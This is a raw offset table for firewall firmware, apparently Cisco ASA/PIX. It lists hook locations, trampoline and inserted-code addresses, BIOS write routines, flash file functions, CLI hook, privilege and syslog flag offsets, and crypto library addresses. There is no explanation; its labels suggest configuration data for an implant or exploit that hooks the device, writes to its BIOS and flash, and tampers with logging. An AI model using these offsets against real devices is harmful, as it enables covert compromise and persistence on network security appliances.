; --- SECTION I ---
;
0x40082400
0x213a000 
0x0   0x08ab8fe0
0x1   0x08ab8990
0x2   0x08066c90
0x3   0x08527110
0x4   0x08066df0
0x5   0x092dd300
0x6   0x0931e5ac
0x7   0x09300a90
0x8   0x09300230
0x9   0x09300050
0xa   0x08065fe0
0xb   0x00000014
0xc   0x00000010
0xd   0x00000094
0xe   0x00000078
0xf   0x09302400
0x15  0x08063590
0x16  0x08064a00
0x17  0x08064fe0
0x18  0x088dd750
0x19  0xffffff5c
0x1a  0x00000000
0x1b  0x04
0x1c  0x0c
0x1d  0x24
0x1e  0x10
0x1f  0x20
0x20  0x08528260
0x21  0x08528d30
0x22  0x08527730
0x23  0x08539300
0x24  0x08853e20
0x25  0x088540e0
0x26  0x085234c0
0x27  0x0852b5f0
0x28  0x08938720
0x2a  0x64
0x2b  0x5c
0x2c  0x44
0x2e  0x000001ac
0x2f  0x09e4bee0
0x30  0x09e3b930
0x31  0x00000014
0x32  0x00000018
0x33  0x00000128
0x34  0x09e59cf8
0x35  0x09f78828
0x36  0x089368b0
0x37  0x000000df
0x38  0x10
0x39  0x00
0x3a  0x00000424
0x3b  0x0847bec0
0x3c  0x0847bfa0
0x3d  0x0847b500
0x3e  0x0847bde0
0x3f  0x00000040
0x40  0x09f9dc80
0x42  0x0931bdb0
0x43  0x085167d0
0x44  0x083ada5f
0x45  0x01c916c4
0x46  0xffffffff
0x47  0x2c
0x49  0x08048000
0x4a  0x09884000
0x52  0x0855e380
;
; --- END OF SECTION I ---
;
:EOS:
;
; --- SECTION II ---
;
HookLocation              0x0870fdcb
HookedCall                0x087143f0
JmpLocation               0x091f395a
InterfaceAddr             0x09e3b930
InterfaceLeng             0x000001a4
IntSecurityOffset         0xffffff5c
IntNameOffset             0x00000174
IntNumOffset              0x000000df
IntVlanOffset             0x10
IntIPOffset               0x18
IntNetmaskOffset          0x1c
FlashClassAddr            0x00000000
CryptoDeviceAddr          0xffffffff
ArpTableAddrPtr           0x0999087c
NumInterfaces             0x00000000
IfaceStruct2              0x00000000
IfaceStruct2Len           0x00
BiosClassAddr             0x09f8e160
BiosWriteAddr1            0x083a19c0
BiosWriteAddr2            0x083a5000
BiosWriteAddr3            0x083a4d80
BiosWriteAddr4            0x083a5bd0
BiosWriteOffset           0x00000020
FlashMkdirAddress         0x0847cab0
ASAFlashRmdirAddress      0x083aecd0
PIXFlashRmdirAddress      0x083915a0
ASAFlashRmfileAddress     0x083ae3c0
PIXFlashRmfileAddress     0x08391280
FlashDirlistAddress       0x0847c1a0
FlashGetSizeAddress       0x0847cd90
FlashChmodAddress         0x0847c640
FlashMoveFileAddress      0x0847c7a0
FlashGetFileInfoAddress   0x00000000
FlashGetSpaceAddress      0x0847dc60
FlashFileInfoSizeOffset   0x0000002c
GetPlatformStringAddr     0x093135b0
ASARestatFlashFlagAddr    0xffffffff
AnnounceFunc              0x08066aa0
DevIoctlOffset            0x70
DuartTtyAddr              0x098f8960
CIStartFunc               0x080cbe40
CommandListAddr           0x099ddde0
DeviceListPtrAddr         0x09da07f4
DeviceNextPtrOffset       0x50
StrcmpFuncAddr            0x09306490
SyslogFlagPtrAddr         0x0a126ea0
PGDGETValue               0x85b00002
PGDPUSHValue              0x85b00003
PGDSETValue               0x85b00000
StdChOffset               0x84
StdErrOffset              0x88
PrivFlagOffset            0x0c
UnameOffset               0x14
EnvPtrOffset              0x90
SyslogOffset              0x00000bc4
Open                      0x08066c90
ChannelConfigOffset       0x08
InputModeOffset           0x14
InputModeEsc              0x20
WatchDogTimeout           0x09885b04
UpTimeCounter             0x09f78828
Display_uptime_addr       0x080d5630
Inserted_code_addr        0x091f395a
i2cReadByte               0x092ec430
i2cWriteByte              0x092ec5e0
CLIHookAddress            0x080cc321
AvailMemoryPtr            0x0a0c225c
;
;
srand                     0x09302480
BN_new                    0x0923cd50
BN_free                   0x0923ccc0
BN_mod_exp                0x09274550
BN_CTX_new                0x0925a000
BN_CTX_free               0x0925a2b0
BN_bin2bn                 0x0923db10
BN_bn2bin                 0x0923d5e0
BN_bn2hex                 0x0925c340
BN_num_bits               0x0923d480
DH_p                      0x098c4a60
EVP_CIPHER_CTX_init       0x09241220
EVP_CipherUpdate          0x092416c0
EVP_CIPHER_CTX_cleanup    0x09241a10
EVP_CipherFinal           0x09241b00
EVP_CipherInit_ex         0x09241f60
EVP_aes_128_cbc           0x09244230
slimHookAddr              0x08710034
slimTrampoline1           0x080570e1
slimTrampoline2           0x08058be1
HookByte1                 0x56
HookBytes2to5             0x2cec8353
InterfaceOffset           0x0000000c
codepageBase              0x00000000
osVerAddr                 0x09884620
textSize                  0x0134b9c4
;
; --- END OF SECTION II ---
;
:EOS:
;
